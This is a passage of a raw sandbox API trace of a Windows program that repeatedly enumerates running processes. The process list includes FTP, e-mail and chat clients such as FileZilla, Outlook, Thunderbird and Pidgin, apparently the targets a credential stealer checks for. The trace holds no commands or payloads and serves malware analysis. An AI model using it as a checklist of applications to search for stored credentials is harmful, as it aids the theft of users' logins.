cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0189.394] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0189.397] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0189.401] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0189.404] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0189.410] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0189.413] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0189.416] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0189.419] Process32Next (in: hSnapshot=0x1bcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0189.421] CloseHandle (hObject=0x1bcc) returned 1 [0189.422] Sleep (dwMilliseconds=0x64) [0189.538] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0189.555] Process32First (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.558] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0189.560] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0189.563] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.565] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0189.567] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.570] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0189.572] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0189.575] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0189.618] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.621] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.623] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0189.625] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.630] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.632] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.634] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.636] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.640] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.643] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.645] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0189.647] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0189.650] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.653] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0189.654] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.713] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0189.714] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0189.716] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0189.718] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0189.721] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0189.722] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0189.724] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.725] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.727] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0189.729] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.731] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.732] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0189.735] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0189.737] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0189.739] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0189.740] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0189.743] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0189.745] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0189.747] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0189.752] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0189.754] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0189.757] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0189.760] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0189.762] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0189.764] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0189.767] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0189.769] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0189.771] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0189.773] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0189.776] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0189.778] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0189.781] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0189.783] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0189.786] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0189.793] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0189.796] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0189.799] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0189.802] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0189.805] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0189.807] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0189.812] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0189.814] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0189.817] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0189.820] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0189.822] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0189.825] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0189.833] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0189.836] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0189.838] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0189.841] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0189.844] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0189.846] Process32Next (in: hSnapshot=0x18ec, lppe=0x102efe20 | out: 